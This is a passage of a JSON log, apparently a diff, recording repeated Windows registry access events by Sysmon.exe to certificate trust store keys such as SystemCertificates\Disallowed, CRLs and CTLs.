"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570862930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570863090000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 